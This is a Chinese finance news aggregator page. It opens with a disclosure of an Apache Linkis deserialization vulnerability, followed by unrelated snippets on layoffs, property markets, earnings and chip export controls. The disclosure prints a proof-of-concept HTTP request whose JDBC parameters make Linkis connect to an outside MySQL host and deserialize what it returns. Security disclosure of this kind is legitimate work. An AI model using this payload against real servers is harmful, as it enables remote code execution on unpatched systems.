FX168财经网_全球视野外汇黄金加密货币NFT资讯网

Numen漏洞研究员发现Apache linkis反序列化漏洞

la/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://10.211.55.6:8088 Referer: http://10.211.55.6:8088/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8 Cookie: linkis_user_session_ticket_id_v1=3cSULn63z6BRzonTuKWkmSAyp90ueJCH Connection: close {"id":1,"dataSourceName":"test","dataSourceTypeId":1,"createSystem":"Linkis","connectParams":{"password":"RoOt123.","databaseName":"test","port":"3306","host":”149.**.**.150","driverClassName":"com.mysql.jdbc.Driver","params":"{\"connectionAttributes\":\"t:cb194\",\"autoDeserialize\":\"true\",\"statementInterceptors\":\"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\"useSSL\":\"false\"}","username":"root"},"createTime":1667210719000,"modifyTime":1667210718000,"createUser":"root","versionId":1,"expire":false,"dataSourceType":{"name":"mysql","layers":0}} 修复 1.3.1 version add blacklist / 1.3.1版本添加黑名单 linkis-commons/linkis-common/src/main/java/org/apache/linkis/common/utils/SecurityUtils.java https://github.com/apache/linkis/commit/a652276961e39a6e0d6f79698e2b082a72f160d1#diff-d9f1daccf16be38b1c2a2b946ea9e8b27f5d7713b3981afef222ffe00e3b4a67 时间线 2022-11-02 Reporter to apache / 2022-11-02 向apache报告 2022-12-10 Fix the issue / 2022-12-10 修复 2023-01-19 Release apache linkis 1.3.1 version / 2023-01-19 发布apache linkis 1.3.1版本 2023-01-31 Public cve email / 2023-01-31 公开cve邮件许多公司已经用 Linkis 来解决大数据平台连通、扩展、管控、编排等计算治理问题；涉及金融、电信、制造、互联网等多个行业。其安全性需要各Web3项目方提高重视，及时关注各种Web3基础架构的安全漏洞并及时打好补丁，以避免潜在的安全风险和数字资产损失。我们将及时挖掘，追踪各种web3上的安全风险，以及提供领先的安全解决方案，确保web3世界链上，链下安全无虞。参考 https://lists.apache.org/thread/zlcfmvt65blqc4n6fxypg6f0ns8fqfz4 https://github.com/apache/linkis/issues/23 来源：金色财经

金色财经2023-02-02

自今年年初以来超过8.2万名科技行业员工失去了工作

，计划在全球裁员约1.2万人，英特尔（Intel Corp.）则表示，将在硅谷裁员数百人。　　微软（Microsoft Corp.）也证实计划裁员约1万人。天空新闻和彭博社早些时候的报道曾暗示，这家软件制造商正准备裁员。　　Spotify Technology SPOT也加入了今年裁员的行列。在提交给美国证券交易委员会的一份文件中，这家流媒体服务公司表示，将裁员约6％，相当于约588个工作岗位。　　本月早些时候，Coinbase Global Inc.发布了一份报告宣布将裁员950人以削减成本。

金融界2023-02-02

中、美、英房地产市场低迷加剧对全球经济增长构成风险

率和放宽首付要求。Bloomberg Intelligence分析师Kristy Hung表示，这些措施在年中之前不太可能提振销售额。中国房地产市场持续疲软的前景是野村控股公司对今年增长前景的升级看法的潜在不利因素，经济学家在1月31日的一份报告中写道。他们援引官方的说法，即“房子是用来住的，不是用来投机的”，而房价下跌是对投机需求的抑制。英国经济衰退在英国，十多年来的稳定增长已经让位于自2008年全球金融危机以来持续时间最长的房价下跌。 Nationwide Building Society表示，平均房价已连续五个月下跌。抵押贷款利率的飙升和一代人以来最紧张的生活成本危机正在挤压购房者的消费能力，使更多人无法负担房产成本。 Nationwide首席经济学家Robert Gardner表示：“短期内总体负担能力状况看起来仍将充满挑战。” 特拉斯在短暂担任首相期间制定的预算计划扰乱了抵押贷款市场，因此10月份两年期固定利率房屋贷款的平均利率跃升至6.65%的14年高点。抵押贷款利率已从峰值下降至远低于6%，但购房者和续签交易的家庭仍面临着痛苦的高月还款额。

Peng2023-02-01

2月美联储决议前瞻：这些线索最可能引爆行情！

更大的宽容。　　Bloomberg Intelligence的策略师Wendy Soong认为，这种情况归因于企业积极的重组工作和成本削减计划增强了投资者的信心。　　但威尔逊的团队认为，实际上，企业盈利比预期的要差，尤其是在利润率方面。威尔逊表示：“美联储不愿转向更鸽派的立场，以及自2008年以来最严重的盈利衰退再次被错误定价。这可能会在短期内导致本轮熊市的最后一轮下跌。”

金融界2023-02-01

“卖出”！《大卖空》原型“一个字示警金融市场” 剑指美国房市崩盘？

和放宽首付要求。据Bloomberg Intelligence分析师Kristy Hung表示，这些措施在年中之前不太可能提振销售额。澳大利亚、新西兰 1月份澳大利亚和新西兰的房价继续下跌，下滑可能会继续，因为这两个房地产市场都没有受到去年利率飙升的全面冲击。许多新西兰家庭使用的是固定利率抵押贷款，但尚未滚动至更高的新利率。因此，经济学家预测房价将进一步下跌，到2024年初将比2021年底的峰值至少低20%。 CoreLogic数据显示，首都惠灵顿的房价已较上年同期下跌18.1%。在最大的城市奥克兰，房价下跌了8.2%。 (来源:彭博社) 澳大利亚的情况与此类似，根据彭博资讯的一份报告，今年抵押贷款转向更高浮动利率的人的贷款偿还激增将对消费造成压力。分析师莫森·克罗夫茨(Mohsen Crofts)和杰克·巴克斯特(Jack Baxter)在报告中表示，当超低固定利率到期时，15%的房屋贷款的还款额可能会增加80%以上。他们估计家庭收入受到的打击将相当于零售额的2.2个百分点。

圈内人2023-02-01

中国房市幻象破灭！一二线城市推盘惨淡、地产股暴跌 “香港负资产推高18年高位”

幻想确实破灭。根据Bloomberg Intelligence追踪中国40个主要城市的数据，截至1月27日的农历新年那一周，截至周一上午11点10分，彭博情报开发商的一项开发商指标下跌3%。中指研究院统计数据表明，今年春节假期，上海、深圳、长沙、武汉等11个代表城市的新房成交规模，相比2022年春节假期下降约21%，仅恢复至疫情前春节(2019年)的75%。克而瑞研究中心的监测数据则显示，春节假期40个重点城市商品住宅成交面积仅为35.7万平方米，环比下降75%，同比下降14%，与疫情尚未开始的2019年同期相比降幅达到32%。相比而言，三四线城市则有改善迹象。克而瑞研究中心的数据显示，28个三四线城市商品住宅成交面积虽然环比下降61%，但同比上涨13%，东南沿海城市诸如温州、东莞、中山、珠海等涨幅均超50%。报道认为，这表明返乡置业初见端倪。有业内人士指出，虽然年前降首付、降利率等密集利好政策叠加，但并未在楼市激起太大的浪花，多数城市推盘积极性不高。彭博社文章中也提到，在中国突然终止其新冠清零政策后，今年在新冠封锁期间留守大城市的农民工和白领工人，有机会在家乡寻找房产。 United First Partners亚洲研究主管Justin Tang表示：“销售额的下滑继续削弱投资者的信心。” “只有当房地产政策在整个系统中发挥作用，当经济在中国重新开放后反弹，随后国内家庭现金流和资产负债表有所改善时，复苏才会显现。” “由于国内市场低迷仍在继续，开发商并没有真正增加大量供应来抓住传统的销售旺季，”中指控股副研究总监Chen Wenjing表示。据财经网周日(1月29日)发出的消息，国家发展改革委等部门近日推出措施，鼓励支持有条件有意愿的搬迁群众进城落户。文章提到，有网友把这一措施解读为一种空前的救市措施，北京、上海等一线城市的房价估计会在几个月后进入上升通道。香港负资产推高至18年高位随着金融中心在十多年来最严重的房地产市场低迷中苦苦挣扎，香港房屋价值低于抵押贷款的人数激增至18年来的新高。香港金融管理局公布的数据显示，第四季度出现所谓负资产的个案12164宗。根据mReferral Mortgage Brokerage Services的数据，这比上一季度高出22倍。这些水下抵押贷款的总价值为663亿港元，约合85亿美元。价格下跌加上利率飙升，正在挤压房主在传统上是世界上最昂贵的房地产市场之一。根据中原地产的数据，2022年房价下跌约16%。决定大多数抵押贷款利率的该市一个月借贷成本，在12月攀升至四年高位。尽管如此，最近与中国大陆重新开放边境以及取消香港大部分与新冠病毒相关的限制，都提振了市场的乐观情绪。mReferral首席副总裁Eric Tso在一份电子邮件声明中表示，鉴于房屋价值可能上涨，第二季度负资产房屋的数量可能会下降。

圈内人2023-02-01

通用汽车公布Q4财报营业利润创纪录供应链问题缓解盘中股价暴涨8%

431亿美元。根据研究公司Wards Intelligence的数据，通用汽车第四季度在北美的汽车产量同比增长37%。根据FactSet的数据，通用汽车表示，其预计的2023年税前利润总额将在105亿美元至125亿美元之间，即每股6至7美元，高于分析师平均预测的每股5.78美元。通用汽车高管表示，他们注意到不确定的经济背景，并计划在未来两年内削减 20 亿美元的成本。裁员将来自车辆开发计划、一般管理费用和员工流失，尽管高管们表示没有裁员计划。通用汽车表示，将向以美国汽车工人联合会为代表的小时工支付创纪录的5亿美元利润分成。工会表示，这相当于为符合条件的员工平均支付了12,750美元的支票。该公司计划在今年晚些时候与工会谈判一份新的为期四年的劳动合同。为了确保未来的电动汽车电池供应，通用汽车表示，它正在对Lithium Americas Corp进行6.5 亿美元的股权投资，作为其在内华达州开发矿山计划的一部分。通用汽车表示，这个名为Thacker Pass的矿场是美国已知的最大锂矿产地，通用汽车计划使用从该矿场提取的碳酸锂生产通用汽车的电动汽车电池。投资者正在密切关注通用汽车定价能力的弹性。与其他汽车公司一样，通用汽车在过去两年中的价格很高，由于汽车供应紧张创造了卖方市场，买家支付了高价。该公司限制了利润较低车型的产量，转而生产其最大的赚钱工具、皮卡和大型SUV。华尔街分析师和汽车业高管普遍预测，买家今年会降低他们愿意支付的价格。问题是多少和多快。特斯拉在1月中旬下调了多款车型在美国的价格，随后福特周一也下调了Mustang Mach-E电动SUV的价格。一些分析师表示，随着库存重建和利率压缩消费者预算，降息可能会增加定价能力的下行压力，而定价能力已经预计会下降。通用汽车财务总监Paul Jacobson表示，该公司不打算改变其电动汽车定价以应对这些举措。 “我们的客户表示根据看到的需求，我们的车辆定价合理。”去年，通用汽车将其雪佛兰Bolt EV的价格下调了约18%。通用汽车计划今年推出几款新的电动汽车车型，包括雪佛兰Blazer，其尺寸与特斯拉Model Y和福特Mach-E相似，价格低于两者，起价约为36,000美元。通用汽车高管曾表示，尽管利率上升、二手车价格下跌以及其他可能让汽车买家望而却步的因素，他们相信潜在买家的大量积压将保持不变。通用汽车首席执行官Mary Barra 表示：“从1月份的早期阅读来看，这是非常积极的。” 该公司表示，第四季度通用汽车汽车的平均价格为51,770美元，较上年同期下降约2,000美元，但以历史标准衡量仍处于高位。

一禾2023-02-01

财报季“王炸”！苹果，谷歌，亚马逊、Meta扎堆来袭，市场再次迎来大考

性改善。　　研究公司Insider Intelligence分析师Debra Williamson也表示，有一些迹象表明，Meta的广告业务可能出现了一些转机。自2021年4月苹果ATT（App追踪透明度）生效以来，Meta一直致力于改进其广告追踪技术，并开始在利用其他数据来源定位用户。例如，Meta从Shopify移植客户数据有助于提高向用户精准投放广告的能力。　　Williamson表示，尽管Meta在制定工具和指标来提高广告的有效性上面临着很多挑战，但这一点正在变得更好，与过去几个季度相比，Meta业绩可能会出现一些反弹。　　Cavenagh Research还强调，投资者还应考虑到第四季度外汇逆风不会像第三季度那样强劲，因为美元指数已出现了大幅贬值；而Meta也存在成本支出超预期放缓的可能，因该公司已宣布了重要的成本削减计划，其中包括裁员13％，预计会使Meta的股权价值增加约300亿美元。　　投资银行Jefferies也预计，Meta旗下Instagram上的短视频功能将成为其股价反弹的支柱。在费用削减和新的变现驱动因素的推动下，Meta将成为表现最好的大型公司。　　苹果：美东时间2月2日盘后公布财报　　多家机构预测认为，受累于iPhone供应受限以及需求疲弱的双边影响，$苹果（AAPL.US）$2023财年第一季度营收可能出现2019年以来的首次下滑。　　其中彭博预计，苹果该财季营收为1225.64亿美元，同比下滑1.11％；经调整净利润预计录得315.24亿美元，同比下滑8.97％。　　在苹果全财年的营收构成中，Q1营收通常最高。2022财年Q1，苹果实现营收1239.5亿元，同比增长11％，并创下了公司有史以来最高的单季度营收。但在过去三个月，苹果业绩预期经历了22次下调；多家机构认为，苹果在本周将无法交出一份打破单季营收纪录的财报。　　上一财季（即2022财年Q4），苹果实现营收901.46亿美元，同比增8.14％，高于市场预期。但在财报电话会上，CEO库克也表示，下一财季收入增长将会有所放缓，并且苹果已经放缓了招聘步伐。　　分析师普遍预计，自去年10月起，由于产能不足导致手机出货量下降的问题，将在这一财季的财报中部分体现。　　此前，TrendForce预估，2022年第四季度iPhone全系列出货量将同比减少22％；而天风证券分析师郭明錤此前也曾下修2022年第四季度iPhone出货量约20％，至7000万~7500万部。他预计，期内iPhone营收可能较市场预期明显下降。　　美国银行分析师Wamsi Mohan表示，考虑到（12月当季）高端iphone Pro型号的供应严重受限，此次财报电话会议的基调对于理解潜在需求轨迹至关重要。　　此外，受利率上升、通胀高企和增长乏力的影响，智能手机和个人电脑市场需求开始疲弱。据Canalys数据显示，去年第四季度智能手机市场的表现是10年来同期最糟糕的。但值得注意的是，与前几个季度不同，智能手机高端市场需求量开始激增。　　受其最新的iPhone手机推出的影响，苹果在第四季度赢得了有史以来最高的季度市场份额25％，同比增长8.7％。　　除了智能手机，个人电脑市场同样需求不振。但苹果是唯一一家没有录得双位数下滑的主要制造商，期内出货量仅下降2.1％至750万台。IDC报告显示，在截至去年9月底止的三季度，Mac季收达到创纪录的115亿美元，超出预期值20亿美元，弥补了iPhone销售的不足。　　分析师预期，本次发布的财报中，Mac业务将同样录得不俗表现，提振苹果整体业绩。　　谷歌：美东时间2月2日盘后公布财报　　据彭博预计，$谷歌-A（GOOGL.US）$第四季度营收为640.35亿美元，同比下滑14.99％；经调整净利润预计录得171.77亿美元，同比下滑16.79％。　　从财务数据方面看，谷歌大部分收入来自其广告服务。因处于数字广告支出疲软的宏观经济逆境中，Jefferies分析师表示，谷歌的广告业务预计将出现一些疲软。　　但据媒体报道，在经历了残酷的2022年后，投资者开始回归在线广告行业，分析师预计2023年财务业绩将反弹，在本周就能看到一些复苏的迹象，公司业绩预计将披露品牌在暂停广告活动后是否开始增加相关支出等最新信息。　　除了广告收入，投资者还需留意被视为谷歌未来的第二增长曲线的云业务。相比于疲软的广告业务，谷歌云在第三季度获得了超预期的增长。据《华尔街日报》，谷歌云计算的销售额排名第三，仅次于竞争对手亚马逊公司和微软。由于每季度确认的云收入增速维持高位（尤其是在当前的环境下），可见谷歌云的产品竞争力并不弱。　　截至目前，云业务在谷歌的总营收中所占的比例不足10％。假设数字广告业务的放缓趋势持续下去，投资者或将关注谷歌的云业务能否成为一个强有力的抵消因素。　　亚马逊：美东时间2月2日盘后公布财报　　据彭博预计，$亚马逊（AMZN.US）$第四季度营收为1456.97亿美元，同比增长6.03％；经调整净利润预计录得61.32亿美元，同比下滑57.19％。　　2022年，亚马逊股价接近腰斩，其利润增长放缓是该股股价在过去一年表现不佳的主要原因之一。该公司的投资、劳动力成本和研发成本侵蚀了相当大一部分的利润。　　自今年年初以来，市场对该公司的营收和盈利预期也有所下调，这表明对该公司是否有能力度过影响消费者支出的这一具有挑战性的通胀环境的担忧情绪增强。　　2022年第三季度，受强势美元拖累，亚马逊国际、AWS等业务表现不及预期，连累公司收入低于市场预期。此外，市场看重的亚马逊四季度业绩指引同样逊于市场预期。　　按照亚马逊的估计，四季度的净销售额增速将是近年来最低的。通常来说，四季度包含美国感恩节和圣诞节两大消费旺季，也是零售商获利的大好机会。但是，随着美国宏观经济不确定性增加，越来越多的消费者打算在假日季缩减开支。　　但乐观的一面是，亚马逊的云计算业务AWS仍有望实现近30％的营收增长。受大型企业客户越来越多地采用该公司云计算产品的推动，该业务Q4营收预计将在224亿-231亿美元之间，同时将有强劲的盈利表现。　　此外，亚马逊的广告业务也取得了重大进展，如今电子零售商更愿意在公司网站和各种服务上推广自己的品牌。根据Insider Intelligence的数据，亚马逊去年在美国数字广告市场的份额为13％，第三季度其广告业务营收增长了25％。　　根据FactSet的数据，分析师预计亚马逊的广告部门在第四季度将增长17％，远远领先于同行，并在整个2023年保持在百分之十几的营收增速。（来源：富途）

金融界2023-02-01

紧跟特斯拉福特野马Mach-E降价

5万辆电动汽车。而分析机构Motor Intelligence估计，特斯拉2022年在销量超过52.2万辆。　　福特表示，现有待交付车辆的Mach-E客户将自动收到调整后的价格。对于在1月1日之后购买这些车辆的客户，如果他们已经收到了他们的野马Mach-E，福特将向他们提供 “私人报价”。　　除了可以享受调整后的价格，在1月30日和4月3日之间订购Mach-E车辆的客户将有资格获得福特贷款的特别利率，利息低至5.34％。　　福特拒绝透露降价后哪些Mach-E车型依然盈利。该公司预计将在今年晚些时候开始单独报告其电动汽车业务的财务业绩。　　Gjaja表示：“我们需要努力获得更多的利润，因为我们需要将这个数字公开，并且对其负责。” 　　为提高Mach-E的产量，福特公司正在对生产该车的墨西哥工厂进行升级。福特表示，该工厂预计将在下个月重新上线。

金融界2023-01-31

中美半导体重磅消息！美媒：中国核武器研究机构绕过25年禁令成功购买美国芯片

0年以来，该研究院一直设法获得英特尔(Intel Corp.)和英伟达(Nvidia Corp.)等美国公司生产的半导体。报导指出，这些广泛用于数据中心与个人计算机的芯片，通过中国的中间商取得，其中一些是作为运算系统组件采购，而许多是该机构研究计算流体动力学的实验室购买，这是包含建立核爆模型等的广泛科学领域。这样的采购违反美国长期实施的限制，相关管制旨在防范任何美国产品被外国势力用来进行核武器研究。由于从事核研究，中国工程物理研究院是首批被列入美国黑名单(即实体名单)的中国机构之一。《华尔街日报》检视中国工程物理研究院发表的论文发现，过去10年，至少有34篇论文提到在研究中使用美国半导体，相关半导体的使用广泛，包括用于分析数据、生成算法等。核专家表示，当中至少有7篇研究可应用在维护核储备。中国工程物理研究院没有回复记者的置评请求。《华尔街日报》称，这些发现突显了拜登政府面临的挑战。拜登政府正寻求更积极地对抗中国军方使用美国技术。去年10月，美国扩大了出口规定的范围，以阻止中国取得可驱动人工智能与超级计算机的美国最先进芯片与设备，相关领域对现代战争日趋重要。据《美国之音》报道，英伟达公司表示，中国工程物理研究院使用的英伟达品牌的半导体是一般个人电脑中常有的图形处理芯片，由于全世界的个人电脑销售量巨大，没有一家芯片公司能够控制每台电脑最终的用户是谁。英特尔公司表示，公司遵守美国的出口管制条例，公司的分销商和用户也必须遵守有关的限令。不过，一名前美国国防部官员说，中国的军方及其供应商通过使用空壳公司和其他方式绕过美国对终端用户实施的限制。《美国之音》称，有关中国核武器研究机构绕过美国出口管制购得美国先进芯片的报道引起了美国国会的注意。众议院外交事务委员会主席麦考尔在一份声明中批评商务部工业与安全局未尽其责。声明说：“我们的政府没有时间抱怨这些问题很难解决。我们需要有解决办法。这是为什么我会彻底评估工业与安全局的有关政策和规则，确保出口管制认真得到执行。时间很宝贵。”

风枫 1评论2023-01-31

24小时热点